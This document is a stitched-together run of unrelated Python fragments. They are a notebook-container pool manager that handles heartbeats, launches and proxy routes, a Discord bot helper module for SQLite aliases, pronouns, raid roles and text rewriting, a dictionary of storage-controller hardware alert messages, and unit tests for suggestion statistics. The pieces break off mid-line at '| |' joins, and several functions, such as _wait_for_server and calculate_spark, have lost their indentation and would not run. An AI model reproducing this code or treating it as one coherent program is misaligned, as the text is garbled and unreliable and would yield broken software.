# No more free containers left to acquire
break
yield tasks
raise gen.Return(len(tasks))
    @gen.coroutine
    def heartbeat(self):
        '''Examine the pool for any missing, stopped, or idle containers, and replace them.
        A container is considered "used" if it isn't still present in the pool. If no max_age is
        specified, an hour is used.'''
        # Re-entrancy guard: heartbeats fire on a timer, and a slow pass must
        # not overlap with the next one.
        if self._heart_beating:
            app_log.debug("Previous heartbeat is still active. Skipping this one.")
            return
        try:
            self._heart_beating = True
            app_log.debug("Heartbeat begun. Measuring current state.")
            # Diagnosis inspects Docker and the proxy and classifies
            # containers/routes (defined elsewhere in this module).
            diagnosis = Diagnosis(self.max_idle,
                                  self.max_age,
                                  self.spawner,
                                  self.container_name_pattern,
                                  self.proxy_endpoint,
                                  self.proxy_token,
                                  self.started,
                                  )
            yield diagnosis.observe()
            tasks = []
            # Stopped containers: remove the Docker leftovers.
            for id in diagnosis.stopped_container_ids:
                app_log.debug("Removing stopped container [%s].", id)
                tasks.append(self.spawner.shutdown_notebook_server(id, alive=False))
            # Zombie routes: proxy entries whose container is gone.
            for path, id in diagnosis.zombie_routes:
                app_log.debug("Removing zombie route [%s].", path)
                tasks.append(self._proxy_remove(path))
            # Stale routes: only recycle containers not still waiting unused
            # in the pool.
            unpooled_stale_routes = [(path, id) for path, id in diagnosis.stale_routes
                                     if id not in self._pooled_ids()]
            for path, id in unpooled_stale_routes:
                app_log.debug("Replacing stale route [%s] and container [%s].", path, id)
                container = PooledContainer(path=path, id=id, token='')
                tasks.append(self.release(container, replace_if_room=True))
            # Normalize the container count to its initial capacity by scheduling deletions if we're
            # over or scheduling launches if we're under.
            current = len(diagnosis.living_container_ids)
            under = range(current, self.capacity)
            over = range(self.capacity, current)
            if under:
                app_log.info("Launching [%i] new containers to populate the pool.", len(under))
                for i in under:
                    tasks.append(self._launch_container())
            if over:
                app_log.info("Removing [%i] containers to diminish the pool.", len(over))
                for i in over:
                    try:
                        pooled = self.acquire()
                        app_log.info("Releasing container [%s] to shrink the pool.", pooled.id)
                        tasks.append(self.release(pooled, False))
                    except EmptyPoolError:
                        # Can only shrink by removing idle containers.
                        app_log.warning("Unable to shrink: pool is diminished, all containers in use.")
                        break
            # Run all scheduled shutdowns/launches concurrently.
            yield tasks
            # Summarize any actions taken to the log.
            # NOTE(review): parameter name `list` shadows the builtin.
            def summarize(message, list):
                if list:
                    app_log.info(message, len(list))
            summarize("Removed [%i] stopped containers.", diagnosis.stopped_container_ids)
            summarize("Removed [%i] zombie routes.", diagnosis.zombie_routes)
            summarize("Replaced [%i] stale containers.", unpooled_stale_routes)
            summarize("Launched [%i] new containers.", under)
            summarize("Removed [%i] excess containers from the pool.", over)
            app_log.debug("Heartbeat complete. The pool now includes [%i] containers.",
                          len(self.available))
        finally:
            self._heart_beating = False
    @gen.coroutine
    def _launch_container(self, user=None, enpool=True):
        '''Launch a new notebook server in a fresh container, register it with the proxy, and
        add it to the pool.

        user: fixed user name for the path; a random one is generated if None.
        enpool: when True, the new container is appended to self.available.
        Returns (via gen.Return) the new PooledContainer.'''
        if user is None:
            user = new_user(self.user_length)
        path = "/user/%s/" % user
        # This must match self.container_name_pattern or Bad Things will happen.
        # You don't want Bad Things to happen, do you?
        container_name = 'tmp.{}.{}'.format(self.pool_name, user)
        if not self.container_name_pattern.match(container_name):
            raise Exception("[{}] does not match [{}]!".format(container_name,
                                                               self.container_name_pattern.pattern))
        app_log.debug("Launching new notebook server [%s] at path [%s].",
                      container_name, path)
        create_result = yield self.spawner.create_notebook_server(base_path=path,
                                                                  container_name=container_name,
                                                                  container_config=self.container_config)
        container_id, host_ip, host_port, token = create_result
        app_log.debug("Created notebook server [%s] for path [%s] at [%s:%s]", container_name, path, host_ip, host_port)
        # Wait for the server to launch within the container before adding it to the pool or
        # serving it to a user.
        yield self._wait_for_server(host_ip, host_port, path)
        http_client = AsyncHTTPClient()
        headers = {"Authorization": "token {}".format(self.proxy_token)}
        proxy_endpoint = "{}/api/routes{}".format(self.proxy_endpoint, path)
        body = json.dumps({
            "target": "http://{}:{}".format(host_ip, host_port),
            "container_id": container_id,
        })
        app_log.debug("Proxying path [%s] to port [%s].", path, host_port)
        req = HTTPRequest(proxy_endpoint,
                          method="POST",
                          headers=headers,
                          body=body)
        try:
            yield http_client.fetch(req)
            app_log.info("Proxied path [%s] to port [%s].", path, host_port)
        except HTTPError as e:
            # NOTE(review): a failed proxy registration is only logged; the
            # container is still pooled/returned below. Confirm this is the
            # intended best-effort behavior.
            app_log.error("Failed to create proxy route to [%s]: %s", path, e)
        container = PooledContainer(id=container_id, path=path, token=token)
        if enpool:
            app_log.info("Adding container [%s] to the pool.", container)
            self.available.append(container)
        raise gen.Return(container)
@gen.coroutine
def _wait_for_server(self, ip, port, path, timeout=10, wait_time=0.2):
'''Wait for a server to show up within a newly launched container.'''
app_log.info("Waiting for a container to launch at [%s:%s].", ip, port)
loop = ioloop.IOLoop.current()
tic = loop.time()
# Docker starts listening on a socket before the container is fully launched. Wait for that,
# first.
while loop.time() - tic < timeout:
try:
socket.create_connection((ip, port))
except socket.error as e:
app_log.warn("Socket error on boot: %s", e)
if e.errno != errno.ECONNREFUSED:
app_log.warn("Error attempting to connect to [%s:%i]: %s",
ip, port, e)
yield gen.Task(loop.add_timeout, loop.time() + wait_time)
else:
break
# Fudge factor of IPython notebook bootup.
# TODO: Implement a webhook in IPython proper to call out when the
# notebook server is booted.
yield gen.Task(loop.add_timeout, loop.time() + .5)
# Now, make sure that we can reach the Notebook server.
http_client = AsyncHTTPClient()
req = HTTPRequest("http://{}:{}{}".format(ip, port, path))
while loop.time() - tic < timeout:
try:
yield http_client.fetch(req)
except HTTPError as http_error:
code = http_error.code
app_log.info("Booting server at [%s], getting HTTP status [%s]", path, code)
yield gen.Task(loop.add_timeout, loop.time() + wait_time)
else:
break
app_log.info("Server [%s] at address [%s:%s] has booted! Have at it.",
path, ip, port)
def _pooled_ids(self):
'''Build a set of container IDs that are currently waiting in the pool.'''
return set(container.id for container in self.available)
    @gen.coroutine
    def _proxy_remove(self, path):
        '''Remove a path from the proxy.

        Best-effort: a failed DELETE is logged but not re-raised, so a dead
        proxy route never blocks container cleanup.
        '''
        # lstrip('/') then re-joining after "/api/routes/" normalizes the
        # path so no double slash appears regardless of caller formatting.
        url = "{}/api/routes/{}".format(self.proxy_endpoint, path.lstrip('/'))
        headers = {"Authorization": "token {}".format(self.proxy_token)}
        req = HTTPRequest(url, method="DELETE", headers=headers)
        http_client = AsyncHTTPClient()
        try:
            yield http_client.fetch(req)
        except HTTPError as e:
            app_log.error("Failed to delete route [%s]: %s", path, e)
@gen.coroutine
def copy_static(self):
if(self.static_files is None):
raise Exception("static_files must be set in order to dump them")
container = self.available[0]
app_log.info("Extracting static files from container {}".format(container.id))
tarball = yield self.spawner.copy_files(container.id, self.static_files)
tar | |
#!/usr/bin/env python3
# misc.py
import asyncio
import io
import operator
import random
import re
from datetime import datetime, date
from typing import Dict, List, Optional, Tuple

import aiohttp
import aiosqlite
import cairosvg
import pytz
from PIL import Image, ImageEnhance
class Database:
    """Thin async wrapper around the bot's SQLite database.

    Covers three tables: word aliases, per-user pronouns, and raid roles.
    Every method opens (and closes) its own short-lived aiosqlite
    connection, so instances are cheap and hold no open handles.
    """

    def __init__(self, conn: str):
        # Path of the SQLite database file.
        self.conn = conn

    async def get_aliases(self) -> Dict[str, List[str]]:
        """Return every alias keyed by the word it replaces.

        Aliases flagged as proper nouns are capitalized on the way out.
        """
        cmd: str = """
        SELECT word, alias, is_proper_noun FROM aliases;
        """
        async with aiosqlite.connect(self.conn) as db:
            db.row_factory = aiosqlite.Row
            async with db.execute(cmd) as cursor:
                aliases: Dict[str, List[str]] = {}
                async for row in cursor:
                    alias = row["alias"]
                    if row["is_proper_noun"]:
                        alias = alias.capitalize()
                    aliases.setdefault(row["word"], []).append(alias)
                return aliases

    async def get_alias(self, word: str) -> Optional[List[str]]:
        """Return the list of aliases for *word*, or None if it has none."""
        aliases = await self.get_aliases()
        return aliases.get(word)

    async def set_alias(self, word: str, alias: str, proper) -> None:
        """Store *alias* as a replacement for *word* (both lowercased).

        proper -- truthy when the alias is a proper noun; it will then be
            capitalized whenever it is fetched.

        Raises AliasExistsError when the alias is already registered for
        the word (compared case-insensitively).
        """
        aliases = await self.get_aliases()
        try:
            # re.escape: the alias is literal user text, not a regex
            # pattern. Without escaping, an alias containing
            # metacharacters (e.g. "c++") would raise or silently match
            # the wrong entries.
            if re.search(re.escape(alias), " ".join(aliases[word]),
                         flags=re.IGNORECASE):
                raise self.AliasExistsError
        except KeyError:
            # No aliases for this word yet; nothing to collide with.
            pass
        cmd: str = """
        INSERT INTO aliases(word, alias, is_proper_noun) VALUES
        (?, ?, ?)
        """
        async with aiosqlite.connect(self.conn) as db:
            await db.execute(cmd, (word.lower(), alias.lower(), proper))
            await db.commit()

    async def rm_alias(self, word: str, alias: str) -> None:
        """Delete one alias for *word*. Silently does nothing if absent."""
        cmd: str = """
        DELETE FROM aliases WHERE word = ? AND alias = ?;
        """
        async with aiosqlite.connect(self.conn) as db:
            await db.execute(cmd, (word.lower(), alias.lower()))
            await db.commit()

    class AliasExistsError(Exception):
        """Raised when an alias is already registered for a word."""
        pass

    async def get_pronouns(self, user_id: int) -> str:
        """Return the stored pronouns value for *user_id*.

        Raises MissingUserError when the user has no row.
        NOTE(review): rm_pronouns stores the integer 0 as a tombstone, so
        callers may receive 0 rather than a string — confirm before
        relying on the str annotation.
        """
        cmd: str = """
        SELECT pronouns FROM pronouns
        WHERE user_id = ? LIMIT 1;
        """
        async with aiosqlite.connect(self.conn) as db:
            db.row_factory = aiosqlite.Row
            async with db.execute(cmd, (user_id,)) as cursor:
                row = await cursor.fetchone()
                if not row:
                    raise self.MissingUserError("No user found.")
                return row["pronouns"]

    async def set_pronouns(
        self, user: str, user_id: int, pronouns: str, max_len=31
    ) -> None:
        """Insert or update the pronouns row for *user_id*.

        Raises ValueError when *pronouns* is max_len characters or longer.
        """
        # Can't parameterize column names
        # (https://www.sqlite.org/cintro.html)
        # So we're doing some basic checking here
        # to make sure users aren't putting in the gettysburg address.
        if len(pronouns) >= max_len:
            raise ValueError("Pronoun too many characters.")
        try:
            # Probe for an existing row to decide between UPDATE/INSERT.
            await self.get_pronouns(user_id)
            cmd = """
            UPDATE pronouns
            SET pronouns = ?, user = ?
            WHERE user_id = ?
            """
        except self.MissingUserError:
            cmd = """
            INSERT INTO pronouns(pronouns, user, user_id) VALUES (?, ?, ?)
            """
        async with aiosqlite.connect(self.conn) as db:
            await db.execute(cmd, (pronouns, user, user_id,))
            await db.commit()

    async def rm_pronouns(self, user_id: int) -> None:
        """Clear a user's pronouns by writing the 0 tombstone value."""
        try:
            await self.get_pronouns(user_id)
            cmd = """
            UPDATE pronouns
            SET pronouns = 0
            WHERE user_id = ?
            """
        except self.MissingUserError:
            cmd = """
            INSERT INTO pronouns(user_id, pronouns) VALUES (?, 0)
            """
        async with aiosqlite.connect(self.conn) as db:
            await db.execute(cmd, (user_id,))
            await db.commit()

    async def get_raid_roles(self) -> List:
        """Return every row of the raidroles table.

        Rows are aiosqlite.Row objects (not bare strings).
        """
        cmd: str = """
        SELECT * from raidroles
        """
        async with aiosqlite.connect(self.conn) as db:
            db.row_factory = aiosqlite.Row
            async with db.execute(cmd) as cursor:
                return await cursor.fetchall()

    async def add_raid_role(self, role_id, role_name) -> None:
        """Register a role for raid announcements.

        If role_id is already present, its stored name is refreshed and
        DuplicateRoleError is raised so the caller can report it.
        """
        cmd = """
        SELECT * from raidroles WHERE role_id = ?
        """
        async with aiosqlite.connect(self.conn) as db:
            db.row_factory = aiosqlite.Row
            async with db.execute(cmd, (role_id,)) as cursor:
                row = await cursor.fetchone()
        # The lookup connection is closed before any write below, instead
        # of opening a second connection while the first is still open.
        if row:
            cmd = """
            UPDATE raidroles
            SET role_name = ?
            WHERE role_id = ?
            """
            async with aiosqlite.connect(self.conn) as db:
                await db.execute(cmd, (role_name, role_id,))
                await db.commit()
            raise self.DuplicateRoleError(
                f'Role "{role_name}" is already in the database.'
            )
        cmd = """
        INSERT INTO raidroles(role_id, role_name) values (?, ?)
        """
        async with aiosqlite.connect(self.conn) as db:
            await db.execute(cmd, (role_id, role_name,))
            await db.commit()

    async def rm_raid_role(self, role) -> None:
        """Remove a raid role by id.

        Raises InvalidRoleError when the role is not in the database.
        """
        cmd = """
        SELECT * from raidroles WHERE role_id = ?
        """
        async with aiosqlite.connect(self.conn) as db:
            db.row_factory = aiosqlite.Row
            async with db.execute(cmd, (role,)) as cursor:
                row = await cursor.fetchone()
        if not row:
            raise self.InvalidRoleError(f'Role "{role}" is not in the database.')
        cmd = """
        DELETE FROM raidroles WHERE role_id = ?
        """
        async with aiosqlite.connect(self.conn) as db:
            await db.execute(cmd, (role,))
            await db.commit()

    class MissingUserError(Exception):
        """Raised when a user has no pronouns row."""
        pass

    class DuplicateRoleError(ValueError):
        """Raised when adding a raid role that already exists."""
        pass

    class InvalidRoleError(ValueError):
        """Raised when removing a raid role that does not exist."""
        pass
class TextUtils:
    async def regex(self, conn: str, text: str) -> str:
        """
        Fancier matching to cover some of the issues I've found with just using
        string.replace; namely:
        * Replacing parts of non-whole words (replacing the "cat" in
        "communicate", etc)
        * Grammatical issues from the cat facts database that,
        while I could fix, I find more interesting to try and replace in-script
        (string.capitalize doesn't detect proper nouns as well as I'd like
        it to, ending a sentence without a full stop, etc.)
        :param conn (str): database connection
        :param text (str): Text to parse and make replacements
        return new_text(str)
        """
        db = Database(conn)
        aliases = await db.get_aliases()
        # NOTE(review): `word` and `choice` are interpolated into regex
        # pattern/replacement positions unescaped; a word with regex
        # metacharacters or an alias containing backslashes would raise or
        # mis-substitute. Confirm the aliases table only holds plain words.
        for word, alias in aliases.items():
            regex = re.compile(r"\b{}s?\b".format(word), flags=re.IGNORECASE)
            # One replacement is chosen at random per word and reused for
            # every occurrence of that word in the text.
            choice = random.choice(alias)
            # Replace the words, but do not remove the pluralization.
            # aka "cats" should become "Songs" and not just "Song."
            if re.findall(regex, text):
                text = re.sub(
                    r"\b{}(\b)?".format(word), choice, text, flags=re.IGNORECASE
                )
        # The text might be multiple sentences. We want to make sure
        # each sentence is capitalized properly.
        # Unfortunately, text.capitalize() doesn't factor in proper nouns,
        # so we split the text into multiple sentences with periods,
        # capitalize the first letter of every sentence,
        # then join them back together.
        # Splits a sentence by periods.
        sub = re.compile(r"\.(\s+)?")
        text_list = sub.split(text)
        new_text_list = []
        # Does a sentence start with a lowercase letter?
        lowercase = re.compile("^[a-z]")
        for x in filter(None, text_list):
            if re.match(lowercase, x):
                letter = x[0]
                x = letter.capitalize() + x[1:]
            new_text_list.append(x)
        # Exclude items in the text list if they have no words.
        new_text = ". ".join(x for x in new_text_list if re.match(r"\w+", x))
        # If there's a dangling comma from the original sentence, replace
        # it with a period.
        if new_text.endswith(","):
            new_text = new_text[:-1]
        if not new_text.endswith("."):
            new_text += "."
        return new_text
def calculate_spark(
self, crystals: int, tens: int, singles: int
) -> (int, float): # noqa
"""
Calculates the amount of draws available and the percentage toward
a spark draw.
:param crystals (int): the amount of crystals a player holds.
300 crystals for a single draw.
:param tens (int): How many ten-draw tickets a player has.
Worth ten draws.
:param singles (int): How many single-draw tickets a player has.
Worth one draw.
Returns (total_draws: int, spark_percentage: float)
"""
if not isinstance(crystals, int):
raise self.InvalidDrawsError("Crystals must be a whole number")
if not isinstance(tens, int):
raise self.InvalidDrawsError(
"Ten-draw tickets must be a whole number"
) # noqa
if not isinstance(singles, int):
raise self.InvalidDrawsError(
"Single tickets must be a whole number"
) # noqa
if crystals < 0:
raise self.InvalidDrawsError("Crystals cannot be less than 0")
if tens < 0:
raise self.InvalidDrawsError(
"Ten-draw tickets cannot be less than 0"
) # noqa
if singles < 0:
raise self.InvalidDrawsError("Single tickets cannot be less than 0") # noqa
draws = (crystals // 300) + (tens * 10) + singles
spark_percentage = (draws / 300) * 100
return (draws, spark_percentage)
def calculate_skin_spark(self, crystals: int) -> (int, float): # noqa
"""
Calculates the amount of draws available and the percentage toward
a skin spark draw.
:param crystals (int): the amount of crystals a player holds.
200 crystals for a single draw.
Returns (total_draws: int, spark_percentage: float)
"""
if not isinstance(crystals, int):
raise self.InvalidDrawsError("Crystals must be a whole number")
if crystals < 0:
raise self.InvalidDrawsError("Crystals cannot be less than 0")
draws = crystals // 200
spark_percentage = (crystals / 40000) * 100
return (draws, spark_percentage)
def no_if_zero(self, number: int) -> str:
"""
Returns either the string version of an integer if the integer
isn't a zero, or the word "no" if the integer is a zero.
"""
return str(number) if number != 0 else "no"
def is_plural(self, number: int) -> str:
"""
Returns either an 's' if the number provided is not equal to 1,
or '' if the number is 1.
Technically I could use the inflect package instead to handle cases
where words need to end in 'es', but this is sufficient for my use
case.
"""
return "" if number == 1 else "s"
def username_parser(self, username: str):
"""
Parses a name to remove the last four discord discriminator numbers
and strip any | |
dual-path configurati'
'on to stack $(storage_node_shelf.stack-id), a'
' SAS HBA port on the controller connected to '
'the disk shelf is disabled, or shelf-to-shel'
'f cabling is incorrect.',
'PossibleEffect': 'Access to disk shelf $(storage_node_shelf'
'.shelf) via controller $(LOCALHOST) might '
'be lost with a failure of controller $(st'
'orage_node_shelf.initiator) port, a singl'
'e shelf-to-shelf cable or a single disk '
'shelf IOM.',
'CorrectiveActions': '1. Consult the guide applicable to you'
'r $(storage_node_shelf.module-type) di'
'sk shelf to review cabling rules and c'
'omplete the SAS cabling worksheet for '
'your system.2. Connect controller $(LO'
'CALHOST) to the first and last disk sh'
'elf of stack $(storage_node_shelf.stac'
'k-id) using active SAS HBA ports.3. Ve'
'rify that controller $(LOCALHOST) is c'
'abled to IOM A at one end and IOM B at '
'another end of stack $(storage_node_shel'
'f.stack-id).4. If disk shelf $(storage_n'
'ode_shelf.shelf) is located between two'
' disk shelves within stack $(storage_no'
'de_shelf.stack-id), verify that IOM A a'
'nd IOM B are properly cabled to their i'
'ndependent domains.5. Contact support p'
'ersonnel if the alert persists.'},
'SinglePathToDisk_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'Disk $(storage_node_disk.disk-name) does not ha'
've two paths to controller $(LOCALHOST) but the'
' containing disk shelf $(storage_node_disk.shel'
'f) does have two paths. Disk $(storage_node_dis'
'k.disk-name) might be faulty.',
'PossibleEffect': 'Access to disk $(storage_node_disk.disk-name'
') via controller $(LOCALHOST) will be lost w'
'ith a single hardware component failure (e.g'
'. cable, HBA, or IOM failure).',
'CorrectiveActions': '1. Reseat disk $(storage_node_disk.disk-n'
'ame) following the rules in the Installat'
'ion and Service Guide.2. Wait six minutes'
' for the alert condition to clear.3. If '
'reseating disk $(storage_node_disk.disk-n'
'ame) fails to clear the alert condition, '
'replace disk $(storage_node_disk.disk-name'
').4. Wait six minutes for the alert condi'
'tion to clear.5. Contact support personne'
'l if the alert persists.'},
'SqrToSqrOrCirToCirPortConnection_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'Shelf-to-shelf connection between disk shelves'
' $(storage_node_shelf_connector.shelf) and $(s'
'torage_node_shelf_connector.remote-shelf) have'
' $(storage_node_shelf_connector.module-type) s'
'quare to square ports or circle to circle port'
's cabled together.',
'PossibleEffect': 'Connection between disk shelves $(storage_n'
'ode_shelf_connector.shelf) and $(storage_no'
'de_shelf_connector.remote-shelf) might be i'
'nactive and cause controller $(LOCALHOST) t'
'o lose connectivity to the shelves.',
'CorrectiveActions': '1. Consult the guide applicable to your '
'$(storage_node_shelf_connector.module-ty'
'pe) disk shelf to review cabling rules a'
'nd complete the SAS cabling worksheet for'
' your system.2. Connect disk shelf $(sto'
'rage_node_shelf_connector.shelf) square '
'port to disk shelf $(storage_node_shelf'
'_connector.remote-shelf) circle port.3.'
' Verify that IOM A of disk shelf $(stor'
'age_node_shelf_connector.shelf) is conn'
'ected to IOM A of disk shelf $(storage_'
'node_shelf_connector.remote-shelf).4. V'
'erify that IOM B of disk shelf $(storag'
'e_node_shelf_connector.shelf) is connect'
'ed to IOM B of disk shelf $(storage_nod'
'e_shelf_connector.remote-shelf).5. Cont'
'act support personnel if the alert pers'
'ists.'},
'StorageFCAdapterFault_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'FC initiator adapter $(mcc_nhm_storage_fc_ada'
'pter.name) is at fault.',
'PossibleEffect': 'Resiliency of backend storage is compromis'
'ed.',
'CorrectiveActions': '1. Ensure that the FC initiator link ha'
's not been tampered with.2. Verify the '
'operational status of the FC initiator'
' adapter by using the command "system '
'node run -node local -command storage'
' show adapter".'},
'ThreePathToStack_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'Controller $(LOCALHOST) has only $(storage_no'
'de_stack.path-count) paths to stack $(storage'
'_node_stack.stack-id).',
'PossibleEffect': 'Only multipath or quad-path configurations'
' are supported for IOM12 stacks.',
'CorrectiveActions': '1. Consult the guide applicable to your'
' $(storage_node_stack.module-type) disk'
' shelf to review cabling rules and comp'
'lete the SAS cabling worksheet for your'
' system.2. Connect controller $(LOCALHO'
'ST) to stack $(storage_node_stack.stack-'
'id) using a multipath or quad-path config'
'uration.3. Contact support personnel if '
'the alert persists.'},
'UnsupportedMixOfIOM12andIOM6Shelves_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'Cabling together disk shelves $(storage_node_'
'shelf_connector.shelf) of $(storage_node_shelf'
'_connector.module-type) and $(storage_node_she'
'lf_connector.remote-shelf) of $(storage_node_'
'shelf_connector.remote-module-type) is not su'
'pported.',
'PossibleEffect': 'Devices might not be accessible by the cont'
'roller.',
'CorrectiveActions': '1. Consult the guide applicable to your '
'$(storage_node_shelf_connector.module-type) disk shelf to revi'
'ew cabling rules and complete the SAS cab'
'ling worksheet for your system.2. Connect'
' disk shelf $(storage_node_shelf_connector'
'.shelf) only to other $(storage_node_shelf'
'_connector.module-type) disk shelves in a '
'stack.3. Connect disk shelf $(storage_node'
'_shelf_connector.remote-shelf) only to ot'
'her $(storage_node_shelf_connector.remote'
'-module-type) disk shelves in a separate'
' stack.4. Contact support personnel if th'
'e alert persists.'},
'BootMediaMissingAlert': {
'severityofAlert': 'Minor',
'probableCause': 'Configuration_error',
'description': 'Node"$(nphm_boot_media_count.display-name)" sup'
'ports 2 boot media devices, but less than 2 boo'
't media devices have been detected.',
'PossibleEffect': 'Boot media is not currently redundant.',
'CorrectiveActions': '1. Halt the node. 2. Verify that both b'
'oot media devices are present and reseat them.3. Reboot the nod'
'e.4. If the problem persists, contact techn'
'ical support for further assistance.'},
'BootmediaReplaceAlert': {
'severityofAlert': 'Critical',
'probableCause': 'hardware_degrading',
'description': 'Bad sector count in the boot media has reached c'
'ritical level.',
'PossibleEffect': 'Upgrading, downgrading, reverting, or applyin'
'g patches to Data ONTAP can damage the boot d'
'evice. If the boot device is damaged, the sto'
'rage system will not boot.',
'CorrectiveActions': '1. Contact technical support to obtain a n'
'ew boot device.2. If possible, perform a ta'
'keover of this node and bring the node down'
' for maintenance.3. Refer to the "Boot medi'
'a replacement guide for your given hardware'
' platform" to replace the boot device.4. Up'
'date the boot device with the appropriate'
' Da'
'ta ONTAP version. 5. Bring the storage syst'
'em online.'},
'BootmediaWarnAlert': {
'severityofAlert': 'Major',
'probableCause': 'hardware_degrading',
'description': 'Boot device is wearing out due to write operatio'
'ns in the form of regular updates.',
'PossibleEffect': 'Upgrading, downgrading, reverting, or applyi'
'ng patches to Data ONTAP can cause addition'
'al wear to the boot device. The boot device'
' might enter critical condition due to the '
'additional wear.',
'CorrectiveActions': '1. Contact technical support to obtain '
'a new boot device.2. If possible, perfo'
'rm a takeover of this node and bring th'
'e node down for maintenance.3. Refer to'
' the "Boot media replacement guide for '
'your given hardware platform" to replac'
'e the boot device.4. Update the boot de'
'vice with the appropriate Data ONTAP ver'
'sion. 5. Bring the storage system online.'},
'CriticalCECCCountMemErrAlert': {
'severityofAlert': 'Critical',
'probableCause': 'DIMM_Degraded',
'description': 'The DIMM has degraded, leading to memory error'
's.',
'PossibleEffect': 'Memory issues can lead to a catastrophic sy'
'stem panic, which can lead to data downtim'
'e on the node.',
'CorrectiveActions': '1. Contact technical support to obtain '
'a new DIMM of the same specification.2.'
' If possible, perform a takeover of this'
' node and bring the node down for maint'
'enance.3. Refer to the DIMM replacement'
' guide for your given hardware platform'
' to replace the DIMM.4. Bring the stora'
'ge system online.'},
'IOXMBadPowerSignalAlert': {
'severityofAlert': 'Major',
'probableCause': 'hardware_degradation',
'description': 'One or more power rails on the I/O expansion'
' module (IOXM) deteriorated.',
'PossibleEffect': 'Devices on the IOXM might not work when th'
'e IOXM is in degraded mode.',
'CorrectiveActions': '1. Contact technical support to get new'
' IOXM that is compatible with your plat'
'form.2. If possible, perform a takeove'
'r of this node and bring the node down'
' for maintenance.3. Replace the IOXM. '
'Refer to the Hardware specification g'
'uide for more information on the posi'
'tion of the FRU and ways to check or '
'replace it.4. Bring the storage system'
' online.5. If the problem persists, c'
'ontact technical support to get the c'
'hassis replaced.'},
'NodeClusFlapWarnAlert': {
'severityofAlert': 'Major',
'probableCause': 'Threshold_crossed',
'description': 'The number of link flapping errors on port "$('
'nphm_clus_flaps_info.display-name)" is above '
'the warning threshold of "$(nphm_clus_flaps_'
'info.threshold)" for the polling period.',
'PossibleEffect': 'Communication from this node to the cluster '
'might be degraded.',
'CorrectiveActions': '1) Migrate any cluster LIF that uses '
'this link to another port connected '
'to a cluster | |
self):
edit_state_content_suggestion = (
self._create_edit_state_content_suggestion())
suggestion_services.reject_suggestion(
edit_state_content_suggestion.suggestion_id, self.reviewer_id,
'review message')
self._assert_community_contribution_stats_is_in_default_state()
# Change the new_value of the html of the suggestion that got rejected
# so we can resubmit the suggestion for review.
resubmit_suggestion_change = edit_state_content_suggestion.change
resubmit_suggestion_change.new_value['html'] = 'new html to resubmit'
# Resubmit the rejected "edit state content" suggestion.
suggestion_services.resubmit_rejected_suggestion(
edit_state_content_suggestion.suggestion_id,
'resubmit summary message', self.author_id,
resubmit_suggestion_change)
self._assert_community_contribution_stats_is_in_default_state()
    def test_create_question_suggestion_increases_question_suggestion_count(
            self):
        """A new question suggestion bumps the question suggestion count
        while leaving every other community contribution stat at zero.
        """
        self._create_question_suggestion()
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 1)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code, {})
    def test_create_multi_question_suggestions_increases_question_count(self):
        """Two question suggestions yield a question suggestion count of 2."""
        self._create_question_suggestion()
        self._create_question_suggestion()
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 2)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code, {})
    def test_accept_question_suggestion_decreases_question_suggestion_count(
            self):
        """Accepting the only question suggestion returns the stats to the
        default (all-zero) state.
        """
        question_suggestion = self._create_question_suggestion()
        # Assert that the question suggestion count increased.
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 1)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code, {})
        suggestion_services.accept_suggestion(
            question_suggestion.suggestion_id, self.reviewer_id,
            self.COMMIT_MESSAGE, 'review message')
        self._assert_community_contribution_stats_is_in_default_state()
    def test_reject_question_suggestion_decreases_question_suggestion_count(
            self):
        """Rejecting the only question suggestion returns the stats to the
        default (all-zero) state.
        """
        question_suggestion = self._create_question_suggestion()
        # Assert that the question suggestion count increased.
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 1)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code, {})
        suggestion_services.reject_suggestion(
            question_suggestion.suggestion_id, self.reviewer_id,
            'review message')
        self._assert_community_contribution_stats_is_in_default_state()
    def test_reject_question_suggestions_decreases_question_suggestion_count(
            self):
        """Batch-rejecting two question suggestions returns the stats to
        the default (all-zero) state.
        """
        question_suggestion_1 = self._create_question_suggestion()
        question_suggestion_2 = self._create_question_suggestion()
        # Assert that the question suggestion count increased.
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 2)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code, {})
        suggestion_services.reject_suggestions(
            [
                question_suggestion_1.suggestion_id,
                question_suggestion_2.suggestion_id
            ], self.reviewer_id, 'review message')
        self._assert_community_contribution_stats_is_in_default_state()
    def test_resubmit_question_suggestion_increases_question_suggestion_count(
            self):
        """Resubmitting a rejected question suggestion raises the question
        suggestion count back to one.
        """
        question_suggestion = self._create_question_suggestion()
        # Assert that the question suggestion count increased.
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 1)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code, {})
        suggestion_services.reject_suggestion(
            question_suggestion.suggestion_id, self.reviewer_id,
            'review message')
